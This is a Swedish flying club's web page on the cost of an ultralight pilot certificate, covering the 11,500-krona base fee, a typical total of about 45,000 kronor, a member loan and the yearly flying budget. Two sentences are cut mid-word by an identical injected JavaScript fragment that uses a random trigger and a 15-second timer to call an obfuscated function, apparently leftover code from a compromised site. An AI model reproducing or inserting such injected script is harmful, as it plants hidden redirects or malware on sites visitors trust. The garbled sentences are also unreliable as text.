Kostnad

Den fak­tiska kost­na­den för ett flyg­cer­ti­fi­kat är bero­ende av ett antal fak­to­rer, som t ex tidi­gare fly­ger­fa­ren­het. Att räkna ut den exakta kost­na­den i för­väg för en enskild elev är där­för svårt, men van­ligt­vis slu­tar det på runt 45.000 kronor.

Den totala kost­na­den för cer­ti­fi­ka­tet består av många olika delar; läkar­be­sök, teo­ri­av­gift, kurs­ma­te­rial, flyg­tid, flyglä­rarar­vode och admi­nist­ra­tiva avgifter.

Du beta­lar först en fast grund­av­gift på 11.500 kro­nor som täc­ker med­lems­av­gift, teo­ri­kurs, kurs­ma­te­rial och dess­utom de tre första prak­tiska flyg­lek­tio­nerna. Res­ten beta­lar du löpandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande under året allt eftersom du fly­ger. Du bestäm­mer själv tak­ten i din prak­tiska flyg­ut­bild­ning, men de flesta bru­kar sikta på att klara av det under en vår/sommarsäsong.

Detal­jer för 2017 hit­tar du i kal­kyl­bla­det Kost­nad Flyg­cer­ti­fi­kat, men prata gärna med oss för att gå ige­nom kost­nads­kal­ky­len för vad just du kan för­vänta dig.

Flyg­cer­ti­fi­kat

Som aktiv pilot är det rekom­men­de­rat att teckna ett med­lemslån där du lånar ut 30.000 kro­nor till klub­ben som en engångs­summa för att få ner flyg­kost­na­den avse­värt. Se vidare under Debi­te­rings­sy­stem.

Efter erhål­let cer­ti­fi­kat behö­ver du flyga ett antal tim­mar varje år. Det lagstad­gade kra­vet är minst 12 tim­mars flyg­ning per år, men du kom­mer garan­te­rat att vilja flyga mer! I bör­jan av varje säsong behö­ver du dess­utom genom­föra en kon­troll­flyg­ning (en så kal­lad “pro­fi­ci­ency check”) för en flyglä­rare inom klubben.

Den lägsta flyg­bud­ge­ten inklu­sive alla avgif­ter som du bör räkna med är cirka 14.000 kro­nor per år.

Med ett UL-certifikat får du inte flyga i kom­mer­si­ellt syfte (t ex trans­por­tera pas­sa­ge­rare eller gods mot betal­ning), men det finns natur­ligt­vis inget som hind­rar att du tar med en kom­pis till t ex Læsø, Visingsö eller Ölandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and och att ni delar på flygkostnaden.

Det finns väl knap­past något roli­gare sätt att använda pengarna?